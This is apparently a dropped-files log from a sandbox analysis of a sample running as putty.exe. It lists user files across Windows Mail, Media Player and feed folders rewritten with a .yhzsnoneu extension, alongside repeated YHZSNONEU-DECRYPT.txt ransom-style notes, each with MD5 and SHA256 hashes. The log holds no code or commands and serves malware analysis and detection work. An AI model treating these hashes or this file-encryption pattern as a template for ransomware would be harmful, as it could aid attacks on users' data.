MD5: 48368f38e399627b518191fa4152ab40
SHA256: 889e62c2bf6a8185c909fc20a2d2f64ab472bdd7904727d6aa2f44299c66ae40
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.yhzsnoneu
binary
MD5: 5e0b8ee1b8d970cf866e417825adabbf
SHA256: a2c6b34eaf060846a4e2a8d120473b6982cb0adc86e66b1cb3f3dc3e50d62b1d
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm.yhzsnoneu
binary
MD5: 7d3347436e36a27c48337bc36b88384c
SHA256: 391afa1d53ea89cfe276181c76c8b26d4c446e43eebbb256b2b65797f2928eb6
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.yhzsnoneu
binary
MD5: 5edf6eb25dbfbb356930fa9cdceb5373
SHA256: 269fc9276942721f2b65548608b95c06f8217b0504da66a4ac7c9278a5d84e95
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.yhzsnoneu
binary
MD5: 10b71b1eb36e42bf7515f52d725e9d05
SHA256: 79583e132e0ee50f1561577f94b8b15ef6339130b56f24d7bc48afa6c46c36fc
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.yhzsnoneu
binary
MD5: 85a41b065cee0cff6fb8cc473cfe48b3
SHA256: 9a5410213b611558606b3da68b389e9c8c1e04fbe001e14fcf158b5f9c433640
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.yhzsnoneu
binary
MD5: b6eac0ad6060c79171158600e99b46c4
SHA256: 446e7807fed54afd2cc579e016e21c3b05dd45aa7cbd38f452e2501c0ee9f3b5
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm.yhzsnoneu
binary
MD5: b334c192dd97e7eea61a2fd7281e5e79
SHA256: 23ce690ca6811c5d21fa5990ca01cac031cb31dbb646b2fd23ceccd908e15ffa
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm.yhzsnoneu
binary
MD5: 42c10404879ef02cebeba6df84a09206
SHA256: d2121eab7894741d5b0b854a6d948a932ba3eb7e8f7a609d33702eca9172851d
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.yhzsnoneu
binary
MD5: 5dcf9761fe21a5f0b14262fbf7a348fc
SHA256: 65c7b3199513c528cedf420531f5dcce8d64bdbe9b68d8405e70d695bfd94f20
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg.yhzsnoneu
binary
MD5: 837c5f054aace87176b1b726d0f18061
SHA256: 83f81196b064e4ddb0750dca3f10ad1ea4918dd2b870772b140c7c71eb074d09
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Music.emf.yhzsnoneu
binary
MD5: c7f10a67b4f958be0f09c11dd0c7ebd5
SHA256: 1fdbda044a051bbdb8c37530c4a98447ef828510ca8b4f59a98fd9c74d2c7071
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Music.emf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Month_Calendar.emf.yhzsnoneu
binary
MD5: 6528678e78b05f97bb30758215141794
SHA256: cc205dfcdead2279620262c04663da820a90e21fa0ed1479e031bb3a715276df
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.yhzsnoneu
binary
MD5: 5c710f7f6b39b41b3ce15073d2117b95
SHA256: 811e9a949eef8f473676ad04d91d534b523bb24d1f03b55bb2fbe0dbe8773777
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Month_Calendar.emf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.yhzsnoneu
binary
MD5: 950e9db61d2143195c53baae1951283a
SHA256: e507f9c8f352ebdb4d14b32b08a58881e14263cc6edd7b4661b8600a057b116a
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Memo.emf.yhzsnoneu
binary
MD5: d9d9aa186cdfd73e69328c6f165d5eb3
SHA256: 21ed209d0eb888501d3d066d50b8342fd0f749a3a006f074c80777fc38a116ed
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Memo.emf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm.yhzsnoneu
binary
MD5: f09d96f4186d62b4547633794e3c2638
SHA256: e88aa02772d531b9de6cab9f80f84873dcacdb478fdc0a6587455f6a85406ff7
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.yhzsnoneu
binary
MD5: 26d2c434fdaf622e30966375db05ffb5
SHA256: 456b54f33f22b4cb3ab058a7611f0e4afd82ef6a0766da4f1fb3f03fa39fd87f
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(cm).wmf.yhzsnoneu
binary
MD5: 25fc206d891957ab6eab6b2f3481189b
SHA256: a75d172cd17933f2b4f05b8d4aba9eb7f0d2d7bc650ff298f236c9c5ebb182e4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(inch).wmf.yhzsnoneu
binary
MD5: 7dfdaf66b7913dbcd694d371afcbbd82
SHA256: 90a51bb31163b22e5ac34feb6940f42c65e0056912d83f5a46bcfe3ae010d364
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(inch).wmf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(cm).wmf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_2.emf.yhzsnoneu
binary
MD5: cf47a309d1910663af2823f6820af2f4
SHA256: 761678bb69402f1970be60561e08c1df3d9dd4f37b6c15d1a72c633d7485d230
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Graph.emf.yhzsnoneu
binary
MD5: d3a135ff90fcae6fc79945d97a925b8c
SHA256: 2c65f05fc00f47a76eab696bab492340a2db892d06f60d8fa9546321ba25a475
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm.yhzsnoneu
binary
MD5: c6448a3dffd9094fa4acad84bbcef8b6
SHA256: 047feab502a4782d89dfe12dca83c0eba7af9db07ae79735d8d32c13b23ee6c0
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_2.emf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Graph.emf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm.yhzsnoneu
binary
MD5: 356cd36a58da81f88ec4974ccb048615
SHA256: f4b58a460a34442c63b6fd0e1d938276bfd8020680d17b9baf051ef88abc9043
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_1.emf.yhzsnoneu
binary
MD5: b9896480ad221ae9857b7cf619102408
SHA256: cb3dfd42a98042aa27d2a83f2681ff41d2cb71db3969b17294bef7dd4db79974
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.yhzsnoneu
binary
MD5: c265692c3580cfe206b688a0275712f4
SHA256: 68475a01ffb8c24f6b1ad23df850f971086aa19e6a8326949a2b7c251148284d
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_1.emf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Cave_Drawings.gif.yhzsnoneu
binary
MD5: 1df7749d5d8c7d6857309967727ed15f
SHA256: e88e818a26bb87f69832ccdebe20998421c6e2b87625db993f627ed63b35c8aa
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.yhzsnoneu
binary
MD5: d1d31298d4b4f8b3f45fdf93f0f9a4e4
SHA256: cd4ab0c9c7d362217c329b88b2714c822fba3c206609b999643762fe4fabe786
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Connectivity.gif.yhzsnoneu
binary
MD5: 0460991cbf7d7367885721cc19452e60
SHA256: 4860eeab717962e00fcdc9134e6f8899653c2023b2b3bb08583009aebbe441a4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Dotted_Lines.emf.yhzsnoneu
binary
MD5: 61d9574314f657a1a8762cb304ba517f
SHA256: 60d23937cc48f9695512d942ed393f44ad981ef4e0851eca9852673bd075ced8
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Cave_Drawings.gif
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Connectivity.gif
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Dotted_Lines.emf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm.yhzsnoneu
binary
MD5: 2c8680c7ab3a47aa5e9554a181254c7e
SHA256: 86f713b332a73015a2e0afd5de4602830e0ce7ecd984e30bc48d57c30f7c8287
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.yhzsnoneu
binary
MD5: 36b5f7820f0d0c50591c1da8971dd45d
SHA256: dd8730939527174870d36570eb62f24bc8952df3ea07dceb1e2392aff735f6ed
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\oeold.xml.yhzsnoneu
binary
MD5: 2d0b3479ed4cff377fb8a03b3224d86f
SHA256: b03a578fd3e16ab32200ed3076aa7f66e22263797c2c70caa68ec4bca1796ace
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs.yhzsnoneu
binary
MD5: 2633caa433095d025ba401d60df9166e
SHA256: 0722dd5619bfda48ee7761caa08f20f7b6a16f5fd3f2717dac078027d1a79bb4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\oeold.xml
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs.yhzsnoneu
binary
MD5: 8bf4ee642b337827d38517e2af95078e
SHA256: 2cccd051665a7334313fac2f7b53ce240071fc39d9ba884c070202adc9bb7488
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb00001.log.yhzsnoneu
binary
MD5: 77605dd9422b5b070c21eb0b0f76542a
SHA256: e9b9b07c8fa05d5c7475125005dba60a4ddb83334ffe2ec034ff80aee8362ba4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb00001.log
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.log.yhzsnoneu
binary
MD5: 5b0f72bd49bf7438de1fd3b7d42f035f
SHA256: 1c3614e51afef9a10f675495186cd73ddd497356c769c6a7fb05d94c062e3620
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.log
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.chk.yhzsnoneu
binary
MD5: d82cedc376ab933c9fc79e65cfa3c0a8
SHA256: bf6e27425bb45cecfa356a4f0170971ad64ff0ada0b8723d667536f8cdec2cc7
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.chk
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore.yhzsnoneu
binary
MD5: b7b5b4610545cab24aa01b83116a943d
SHA256: 9159a4dea523f045a69d9e6eaf6e0bd1033496c924140df774d7cc16bc43e78f
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat.yhzsnoneu
binary
MD5: 57f537282fe116931184027c69c600d2
SHA256: 08e8b12c0654e8433c84bb83c3548619a57d60540612e54c9d27a45e6fadba34
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log.yhzsnoneu
binary
MD5: 157e8141d0a86de2773180878acb8131
SHA256: 270529b4ec657ca23378caf548df5dded994d6f5abb384ccbbb0c6f1abd964a1
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{A9BA3523-71CE-43CF-BD95-F75C31E87D1A}.oeaccount.yhzsnoneu
binary
MD5: f336f6c5546ea11a64644b70bfa9a127
SHA256: 38de4ebdf53215d01cb2f3e6ba5ff360998053a84be5a4a7817997323e4b495c
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{CBB626B1-8A75-4171-911F-13C42949168F}.oeaccount.yhzsnoneu
binary
MD5: 0367ae80d41ad7272586f173dd4f0cdd
SHA256: 5ab8f4971109695af0479d9c0b22ac8ba2725ee20b23f3ea3cbb7571091fbe41
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{C6756DF7-BE4A-458E-9C7E-535BEC29FB9E}.oeaccount.yhzsnoneu
binary
MD5: 95c029ff6a94e198188e972ab3dcc7e5
SHA256: be933e1a6874b4f543001e6abe59dbf93272191e61a8d72ee531596d180e05eb
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{C6756DF7-BE4A-458E-9C7E-535BEC29FB9E}.oeaccount
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{A9BA3523-71CE-43CF-BD95-F75C31E87D1A}.oeaccount
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{CBB626B1-8A75-4171-911F-13C42949168F}.oeaccount
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\12_All_Video.wpl.yhzsnoneu
binary
MD5: 600350747497939dcf99194c31d54f63
SHA256: cea058835c24c87a1b4110296cbaaef892e14d25d7b223f320b97f2e17345067
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\11_All_Pictures.wpl.yhzsnoneu
binary
MD5: 973e8fa63963d6123a8364680c123d66
SHA256: 000b1ad8fd4d7c8eedaa7866b71a997d98b561b0b0b2e4ab46ec100e4c5f320d
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\12_All_Video.wpl
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\11_All_Pictures.wpl
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\09_Music_played_the_most.wpl.yhzsnoneu
binary
MD5: 29b82fa5c13b19fc79bad7467aadaa20
SHA256: a0166d1a1e16a7e38e936067881f0d0e1fe8f0dde1a39d7b036784e1352c45d8
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\07_TV_recorded_in_the_last_week.wpl.yhzsnoneu
binary
MD5: 8f45b325ab5f342bcac05e72c080e9fc
SHA256: 6986c8d76913b707da5b9d4e2d5a33e86ebae4a72112d804c8b6354754cb9f14
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\08_Video_rated_at_4_or_5_stars.wpl.yhzsnoneu
binary
MD5: 0c0c45c59cb04a88efdc2fdc77e7a2f5
SHA256: 0b6fe7d70c2537a8852de9436b7ee8c9331f5d7e1b69843b10dbda305323eb5f
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\10_All_Music.wpl.yhzsnoneu
binary
MD5: 54530bc93f48ccff90c1c8f495fd1e90
SHA256: d82190ea8503a8d6f7f7d48e51b249bae40cbf3079c24a4b781acb61631bd672
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\10_All_Music.wpl
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\09_Music_played_the_most.wpl
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\08_Video_rated_at_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\07_TV_recorded_in_the_last_week.wpl
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\05_Pictures_taken_in_the_last_month.wpl.yhzsnoneu
binary
MD5: b9cfaf5bf7a0d64d0c58d481194e41d7
SHA256: 9c65e83a73d29d28bada9baf51c15fac30048a79d9a49c8b4e4a35f81064c630
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\06_Pictures_rated_4_or_5_stars.wpl.yhzsnoneu
binary
MD5: f389ebc75bfa99b6d0e990a08e9d724d
SHA256: 62f68df09815b7aa0a03703048432f55345425671023472203bad24c72c1e0e4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\06_Pictures_rated_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\05_Pictures_taken_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\04_Music_played_in_the_last_month.wpl.yhzsnoneu
binary
MD5: 25c997be00c6dd0b037cf7e830c2372c
SHA256: 92db2127e725b3f42cb36de61342fce85bbc03abd78a75a11167b2a75fa4400a
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\03_Music_rated_at_4_or_5_stars.wpl.yhzsnoneu
binary
MD5: d20e880541e66dd1556addf410e42bbe
SHA256: 8a9c68259ddcb9f05b2081ddd0833ec967e07355689423d6879891298db3e969
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\02_Music_added_in_the_last_month.wpl.yhzsnoneu
binary
MD5: 3f2f4c51950faea3499025878ed04d13
SHA256: 3632936369d8b9090055d5e98a007f2a284d512f80fd31719f793e6133383fe3
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\04_Music_played_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\03_Music_rated_at_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\02_Music_added_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb.yhzsnoneu
binary
MD5: d271b13848b2935099576947bb7a3bd1
SHA256: 37ce5e90337241254ebed251dd3bba83aceeea8b3b4af09768a8d85948fa5e95
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb.yhzsnoneu
binary
MD5: d7a36ffc81343cfd3141a2f53c85b9b9
SHA256: 5ab7885ddda39661fa81e6c5c10e384c0c4e8d2dd85a3214aa5501688c9aebb1
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\01_Music_auto_rated_at_5_stars.wpl.yhzsnoneu
binary
MD5: f5572e0d232e7cceca496abd9947fe1a
SHA256: 2ab24b72e71d4bb9486f59724e1b5d12484bf10a69dfcdd530067581583d421b
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\01_Music_auto_rated_at_5_stars.wpl
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\index.dat.yhzsnoneu
binary
MD5: 45ae0cd3aa9dbd976a7ced2fa9944c5c
SHA256: 7e8baf436483dfeb2d062160d7857b9bd5d805b8a5dc635dc3a2436343c65d77
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\VM3JD5NM\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.yhzsnoneu
binary
MD5: 67ce570283d8e04397fd7a64548bb588
SHA256: 32832833a3e4dcd0b1df9f806e55f6e1fb55f06a372260152156bf1245ee5fae
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\G4PHTCUR\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms.yhzsnoneu
binary
MD5: 17c0db97887aa45e4e556ba917e9aad2
SHA256: 2c89eee19e8afe5bfc1f4d6914dab01cda54c33384a9a8b69bc179567e917f9d
3020
putty.exe
